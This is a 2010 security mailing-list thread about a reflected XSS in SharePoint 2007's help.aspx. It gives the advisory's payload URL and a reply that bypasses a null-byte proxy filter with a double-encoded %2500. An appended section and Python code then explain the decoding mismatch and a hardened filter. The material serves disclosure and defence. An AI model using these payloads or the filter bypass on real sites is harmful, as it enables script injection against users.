Re: [Dailydave] Sharepoint FTW! :>

From: NeZa (neza0xgmail.com)
Date: Fri Apr 30 2010 - 09:57:44 CDT


My proxy filters out null-byte chars; however, due to SharePoint's decoding
design, I was able to bypass my proxy by injecting the well-known variant
%2500, so the string below also works:

http://wss1-ch-bfr/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%2500%3Cscript%3Ealert%28%27VivaMexico!!%27%29%3C/script%3E&tid=X

My 2 pesos!

On Thu, Apr 29, 2010 at 2:48 PM, dave <daveimmunityinc.com> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Has anyone checked out this Sharepoint 2007 XSS? Does it work? Sharepoint
> is one of
> the single largest data security risks in most large Enterprises and
> everyone pretty
> much ignores it, which is always funny. :>
>
>
> http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html
>
> This is the string that's supposed to work. Someone try it and let us all
> know! :>
>
>
> http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X
>
> - -dave
> (Note: I'm recovering from an illness - your emails will be answered in the
> order
> they were received!)
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
> Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org
>
> iEYEARECAAYFAkvZ4psACgkQtehAhL0ghep4lQCcDY4wc2y9Icx/1oyd+oFgNMun
> VPwAnAnc4dDlUFXVyS3NtsKHdkyG/Q73
> =eAv+
> -----END PGP SIGNATURE-----
> _______________________________________________
> Dailydave mailing list
> Dailydavelists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

--
Daniel Regalado
NeZa Rifa!!!
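The bypass NeZa describes above comes down to a decoding mismatch: the proxy decodes the query string once and looks for a null byte, while the application decodes it again before use, so %2500 passes the proxy as the literal text "%00" and only becomes a real NUL at the back end. The following is an added example, not code from the thread and not SharePoint's own decoding logic: it models a naive single-decode filter, the double-decoding back end, and a hardened filter that canonicalizes the value to a fixed point before checking. The two payload strings are taken from the thread; the proxy and back-end behaviours are assumed models.

```python
from urllib.parse import unquote

# Payloads from the thread: the advisory string (single-encoded NUL) and
# NeZa's double-encoded variant (%2500 -> "%00" after one decode).
PAYLOAD_SINGLE = "MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E"
PAYLOAD_DOUBLE = "MS.WSS.manifest.xml%2500%3Cscript%3Ealert%28%27VivaMexico!!%27%29%3C/script%3E"


def naive_proxy_allows(raw_param: str) -> bool:
    """Assumed model of the proxy: decode the parameter once, reject NUL bytes."""
    decoded = unquote(raw_param)
    return "\x00" not in decoded


def backend_view(raw_param: str) -> str:
    """Assumed model of the application: the parameter is URL-decoded twice
    before it is used, so a doubly encoded NUL becomes a real NUL here."""
    return unquote(unquote(raw_param))


def canonicalize(raw_param: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing (bounded so a hostile input
    cannot make us loop forever). Nested encodings cannot hide bytes from a
    check that runs on this fixed point."""
    cur = raw_param
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            return cur
        cur = nxt
    return cur


def hardened_proxy_allows(raw_param: str) -> bool:
    """Same NUL check as the naive proxy, but on the canonical form, so %00,
    %2500 and %252500 are all treated identically."""
    return "\x00" not in canonicalize(raw_param)


if __name__ == "__main__":
    for name, p in (("single", PAYLOAD_SINGLE), ("double", PAYLOAD_DOUBLE)):
        print(f"{name:6} naive={naive_proxy_allows(p)!s:5} "
              f"hardened={hardened_proxy_allows(p)!s:5} "
              f"backend_has_nul={chr(0) in backend_view(p)}")
```

Run stand-alone, the naive filter blocks the single-encoded payload but lets the %2500 variant through, while the back end sees a NUL followed by the script tag in both cases; the hardened filter blocks both. The real fix is for the proxy to decode exactly as many times as the application behind it, or, where that is unknown, to canonicalize to a fixed point as above and reject anything that needs more than one decoding round.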
